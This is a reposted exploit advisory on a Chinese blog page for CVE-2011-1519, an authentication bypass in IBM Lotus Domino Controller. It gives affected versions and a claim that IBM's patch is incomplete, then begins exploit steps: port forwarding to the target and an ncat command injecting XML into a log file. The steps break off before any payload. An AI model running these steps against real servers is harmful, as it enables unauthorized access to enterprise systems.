博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
IBM Lotus Domino Authentication Bypass
阅读量:2436 次
发布时间:2019-05-10

本文共 1001 字,大约阅读时间需要 3 分钟。

 
# Exploit Title: IBM Lotus Domino Controller auth. bypass# Date:30/11/2011# Author: Alexey Sintsov# Software Link: http://www.ibm.com/# Version:8.5.3/8.5.2 FP3 (0day) # Tested on: Windows 7 / Windows 2008# CVE : CVE-2011-1519  Application: IBM Lotus Domino ControllerVersions Affected: <=8.5.2 FP3, <=8.5.3Manager 4.0 prior to Update 4(0day)Vendor URL: http://ibm.comBug: own XML parser  CVE: CVE-2011-1519CVSS2: 9.0Exploits: YESReported:2010-09-23 via ZDIDate of Public Advisory: 2011-03-22Authors: Alexey SintsovDigital Security Research Group [DSecRG] (research [at] dsecrg [dot]com) This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug,but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day.Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41 EXPLOIT: 1. Make port-fwd from 127.0.0.1:2050 to REMOTE_TARGET:20502. Inject XML into IIS log file (for an example) ncat targethost 49152GET /

转载地址:http://ajhmb.baihongyu.com/

你可能感兴趣的文章
用户态和内核态的概念区别
查看>>
情境领导力
查看>>
赋能:打造应对不确定性的敏捷组织
查看>>
Java 学习方法浅谈
查看>>
Jsp连接数据库大全
查看>>
WebSphere Application Server 常见问题及解答:安全
查看>>
WebSphere Application Server 常见问题及解答:集群
查看>>
使用 SIBus JMS 提供者
查看>>
调试 SCA 调用
查看>>
SOA 治理框架和解决方案架构
查看>>
面向企业的云计算—了解云的一些基本概念
查看>>
实现基于角色的授权
查看>>
使用定制工作流程更新 RSS 数据源
查看>>
使用 WebSphere Business Modeler 进行业务建模
查看>>
SOA 案例研究:Web 2.0 SOA 场景
查看>>
IBM BPM BlueWorks:一次 WebSphere 云试验
查看>>
websphere笔记
查看>>
使用 WebSphere Process Server 关系开发集成解决方案(2)
查看>>
最新最全的Portlet 通信过程详解
查看>>
在LINUX中安装WEB SPHERE5.1的正确方法
查看>>